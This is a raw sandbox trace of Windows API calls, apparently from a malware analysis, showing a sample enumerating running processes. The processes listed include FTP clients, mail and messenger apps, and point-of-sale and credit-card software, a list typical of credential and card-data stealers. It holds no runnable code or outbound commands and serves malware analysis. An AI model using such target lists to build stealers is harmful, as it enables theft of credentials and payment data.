hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0282.540] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0282.542] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0282.547] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0282.550] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0282.552] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0282.554] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0282.556] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0282.588] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0282.595] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0282.597] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0282.599] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0282.602] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0282.604] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0282.610] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0282.612] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0282.614] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0282.615] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0282.617] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0282.619] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0282.621] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0282.625] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0282.627] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0282.629] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0282.631] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0282.632] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0282.634] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0282.636] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0282.672] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0282.674] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0282.675] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0282.677] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0282.678] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0282.680] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0282.682] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0282.683] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0282.687] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0282.689] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0282.691] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0282.692] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0282.694] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0282.695] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0282.697] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.699] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0282.703] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0282.705] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0282.707] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0282.708] CloseHandle (hObject=0x2170) returned 1 [0282.708] Sleep (dwMilliseconds=0x64) [0282.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0282.869] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.871] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.875] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.876] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.878] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.879] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.881] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0282.882] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0282.883] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0282.885] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.886] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.888] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0282.892] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.893] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.895] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.896] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.897] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.899] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.900] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.902] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0282.965] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0282.967] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0282.969] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.971] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0282.973] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0282.975] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0282.976] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0282.978] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.980] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0282.985] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0282.987] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.989] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0282.991] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0282.993] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0282.994] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0282.997] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 